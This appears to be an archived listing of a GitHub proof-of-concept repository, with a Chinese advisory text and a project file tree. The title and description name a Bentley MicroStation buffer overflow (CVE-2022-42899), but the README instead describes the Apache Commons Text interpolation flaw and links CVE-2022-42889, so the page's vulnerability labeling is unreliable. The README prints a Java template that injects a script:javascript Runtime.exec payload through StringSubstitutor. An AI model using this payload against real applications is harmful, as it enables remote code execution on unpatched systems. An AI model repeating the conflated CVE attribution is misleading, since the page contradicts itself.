CVE-2022-42899 PoC — Bentley Systems MicroStation和Bentley View 缓冲区错误漏洞

Source

https://github.com/iamsanjay/CVE-2022-42899

Associated Vulnerability

Title:Bentley Systems MicroStation和Bentley View 缓冲区错误漏洞 (CVE-2022-42899)
Description:Bentley Systems MicroStation和Bentley View都是美国Bentley Systems公司的产品。MicroStation是一个用于二维和三维设计和绘图的 Cad 软件平台。Bentley View是一个免费查看器。 MicroStation 10.17.01.58*之前版本和Bentley View 10.17.01.19*之前版本存在缓冲区错误漏洞，该漏洞源于在打开精心制作的SKP文件时可能会受到越界读取和堆栈溢出问题的影响，利用这些问题可能导致信息泄露和代码执行。

Readme

# CVE-2022-42899
Apache Common Text starting from version 1.5 to 1.9 has Remote code execution vulnerability [CVE-2022-42899](https://www.cve.org/CVERecord?id=CVE-2022-42889). 

```java
final StringSubstitutor interpolator = StringSubstitutor.createInterpolator();
interpolator.replace("${script:javascript:java.lang.Runtime.getRuntime().exec('<payload to execute RCE>"); // Here you will pass payload which you want to execute such as 'mkdir /tmp/cve-2022-42899'
```

File Snapshot


 [4.0K]  /data/pocs/a5b7170d20f5be641ccb29e45a684e6734a92ecc
├── [ 991]  pom.xml
├── [ 468]  README.md
├── [4.0K]  src
│   ├── [4.0K]  main
│   │   └── [4.0K]  java
│   │       └── [4.0K]  org
│   │           └── [4.0K]  evbb
│   │               └── [ 346]  App.java
│   └── [4.0K]  test
│       └── [4.0K]  java
│           └── [4.0K]  org
│               └── [4.0K]  evbb
│                   └── [ 636]  AppTest.java
└── [4.0K]  target
    └── [4.0K]  classes
        └── [4.0K]  org
            └── [4.0K]  evbb
                └── [ 755]  App.class

13 directories, 5 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!